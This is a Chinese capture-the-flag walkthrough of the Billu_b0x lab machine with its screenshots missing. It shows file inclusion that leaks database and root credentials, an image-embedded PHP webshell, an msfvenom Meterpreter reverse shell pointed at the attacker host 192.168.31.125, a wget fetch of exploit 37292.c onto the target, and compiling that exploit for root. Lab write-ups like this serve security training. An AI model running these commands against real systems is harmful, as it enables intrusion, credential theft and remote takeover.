靶机实战-Billu_creat_Files

zaibuchihuajia2025-02-28文章来源:SecHub网络安全社区

1、主机发现

命令上面不显示,下面是嗅探命令。
我们要攻击靶机的一个ip地址:192.168.31.153
2、端口扫描

查看到目标开放的有22,80端口。
3、端口详细信息扫描

4、80端口–http服务
访问主页:

只有用户名、密码和一个login按钮,其它任何地方都不能点击
尝试弱口令点击登录按钮,提示如下:

我这里实用的是万能密码,当然你也可以通过BP抓包,去进行账号密码爆破。----弱口令
4.1扫一下网站目录:

4.2针对这些目录一一查看找找看有没有什么漏洞
依次访问:
http://192.168.31.153/add

找到上传页面,可以尝试上传一句话木马文件:

点击upload没有任何显示,先pass,查看其它目录
http://192.168.31.153/c

http://192.168.31.153/cgi-bin

http://192.168.31.153/cmd

http://192.168.31.153/images/

http://192.168.31.153/in
这一页是php指针,我能能在这里面获得很多信息

http://192.168.31.153/index

主页
http://192.168.31.153/index.php 同上
http://192.168.31.153/panel 也是返回主页页面
http://192.168.31.153/server-status

http://192.168.31.153/show 空白页
http://192.168.31.153/test

这个file有点意思,猜测是文件包含,尝试文件包含: ----这里猜测可能存在文件包含


4.3什么都不显示?? 抓个包查看一下

右键选择change request method—切换post传参方式—然后发送到重发模块repeater


这里页面发现还是有现实结果的
有结果,在尝试包含主页/var/www/index.php:

然后再去包含这两个文件:/var/www/c.php

mysqli_connect,貌似是连接数据库的…,但刚才没扫到数据库登录页面,换大字典扫一下:

很多目录,现在我只需要查找可能是登录数据库的目录:
http://192.168.31.153/

用拿到的用户名密码尝试登录数据库:
// billu b0x_billu
登录成功



用户名密码?尝试登录一下:
//biLLu hEx_it

4.4登录成功,发现有两个功能:

点击add user,可以上传文件:

尝试上传一句话木马文件:1.php

4.5制作图片马上传:12306.jpg


准备一个php文件和一个jpg图片----创建图片马





上传成功,尝试用蚁剑连接:

http://192.168.31.153/uploaded_images/12306.jpg


连接失败…

换system一句话执行系统命令:GET方式

制作图片马,然后上传:

打开hackbar-----点击Execute


可以执行命令,那我直接写一个一句话php文件

查看写入的一句话文件:


用蚁剑成功连接:

拿到webshell

5、提权
查看phpmyadmin的默认的配置文件内容
phpmyadmin的默认的配置文件是:config.inc.php
可自行百度
bp抓包,修改请求方式:

拿到用户名密码:root roottoor
尝试远程连接ssh:

提示密码不对,试一下123456:


6、提权二
提权方式多多,可自行选择

用msfvenom生成一个php后门,利用蚁剑上传:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.31.125 -f raw > test.php


上传到蚁剑

开启msf配置好handler//监听

PHP
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.31.125


触发后门:

查看kali拿到shell:

转化为交互式shell:
python -c 'import pty; pty.spawn("/bin/bash")'

kali查找此系统漏洞,选择exp下载exp到靶机的/tmp目录下,并执行:
└─# searchsploit Ubuntu 12.04

└─# cp /usr/share/exploitdb/exploits/linux/local/37292.c /var/www/html cd /var/www/html

开启apache服务
└─# service apache2 start
下载exp:
wegt http://192.168.31.125/37292.c

编译并执行:
gcc -pthread 37292.c -o exp -lcrypt